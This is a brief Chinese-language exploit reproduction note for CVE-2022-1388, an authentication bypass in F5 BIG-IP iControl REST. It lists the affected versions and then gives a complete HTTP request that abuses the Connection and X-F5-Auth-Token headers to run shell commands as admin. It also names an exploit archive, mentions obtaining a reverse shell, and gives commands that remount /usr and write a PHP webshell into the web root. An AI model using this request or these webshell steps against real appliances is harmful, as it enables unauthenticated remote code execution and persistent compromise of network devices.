漏洞描述#
漏洞描述:
在 F5 BIG-IP 16.1.x 16.1.2.2 之前的版本、15.1.5.1 之前的 15.1.x 版本、14.1.4.6 之前的
14.1.x 版本、13.1.5 之前的 13.1.x 版本以及所有 12.1.x 和 11.6.x 版本,未公開的請求可能會繞過
iControl REST 身份驗證。注意:未評估已達到技術支援終止 (EoTS) 的軟體版本.
複現過程#
HTTP 請求包如下:
POST /mgmt/tm/util/bash HTTP/1.1
Host:xxxxxxx
Connection: keep-alive, x-F5-Auth-Token
X-F5-Auth-Token: anything
Authorization: Basic YWRtaW46
Content-Length: 45
Content-Type:application/json
{
"command":"run",
"utilCmdArgs":"-c id"
}
EXP/POC#
CVE-2022-1388-EXP-main.zip
Webshell 寫入#
反彈獲得了 shell。
Webshell 的寫入可以參考另外一個漏洞 F5 BIG-IP CVE-2020-5902
寫入的路徑為:/usr/local/www
mount -o remount -rw /usr
echo "<?php phpinfo();?> " > /usr/local/www/test.php
mount -o remount -r /usr
訪問路徑:
參考#
F5 BIG-IP 遠程代碼執行漏洞複現(CVE-2020-5902)
CVE-2020-5902 BIG-IP RCE 分析研究